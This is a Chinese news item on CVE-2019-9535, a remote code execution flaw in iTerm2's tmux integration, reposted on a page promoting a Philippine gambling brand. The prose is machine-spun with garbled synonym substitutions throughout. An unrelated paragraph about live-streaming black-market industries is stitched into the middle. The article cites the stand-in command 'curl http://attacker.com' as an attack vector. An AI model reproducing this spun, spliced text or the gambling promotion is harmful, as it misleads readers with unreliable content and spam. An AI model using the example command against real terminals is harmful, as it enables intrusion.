CVE-2019-9535:长达7年的iTerm2 macOS Terminal App RCE破绽 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

CVE-2019-9535:长达7年的iTerm2 macOS Terminal App RCE破绽

菲律宾申博

菲律宾申博提供有趣的泛娱乐新闻资讯,让您一站式掌握明星,电影,电视,综艺,时尚等娱乐新闻资讯。花边娱乐以内容为根本,用户体验为核心,原创娱乐新闻资讯

,

Mozilla Open Source Support Program (MOSS)在举行自力平安审计时在iTerm2 macOS Terminal 模拟器App中发现了一个存在长达7年之久的RCE破绽。iTerm2 macOS Terminal 模拟器App是替换Mac装备内置的terminal APP的最好挑选的开源项目之一。

该破绽CVE编号为CVE-2019-9535,依据Mozilla宣布的平安通告,RCE破绽位于iTerm2的tmux integration 特性中,胜利应用后,进击者能够经由历程向terminal供应歹意输出来实行恣意敕令。

POC视频以下所示:

视频直播类黑色产业链专项分析

导读:2019年9月16日,网络安全宣传周在天津开幕,本次宣传周以”网络安全为人民,网络安全靠人民”为主题。当前,我国网络空间安全问题异常严峻,个人隐私保护,网络诈骗,网络钓鱼,网络漏洞,恶意代码等问题突出,无时无刻不对人们的正常生产生活造成巨大威胁。网络安全具有”水桶效应”,从物理设备安全、行为安全、数据安全再到内容安全,每一个环节都是网络空间安全不可或缺的一部分。 随着近年来移动互联网的发展,产生了一大批内容平台,但因内容不合规,屡屡传出被下架、被关停的消息,由此可见,网络内容安全问题不容忽视,特别是以非法内容形成的黑色产业链应成为重点打击对象

如PoC视频所示,破绽的潜伏进击向量包含连接到进击者掌握的歹意SSH服务器,用curl http://attacker.com 如许的敕令来提取歹意站点,或运用 tail -f /var/log/apache2/referer_log来追踪含有歹意内容的日记文件。

除此之外,该破绽还能够经由历程敕令行东西触发,详细体式格局是诱使其打印进击者掌握的内容,终究许可进击者在用户的mac盘算机上实行恣意敕令。

 

所以该破绽应用历程请求肯定程度上的用户交互,由于该破绽能够用平安的敕令来应用,因而潜伏的平安要挟很大。

该破绽影响iTerm2 v3.3.5及以下版本,在最新宣布的3.3.6版本中举行了修复。研究人员发起用户尽快更新到最新版本。更新体式格局以下所示:

本文翻译自:https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明CVE-2019-9535:长达7年的iTerm2 macOS Terminal App RCE破绽
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址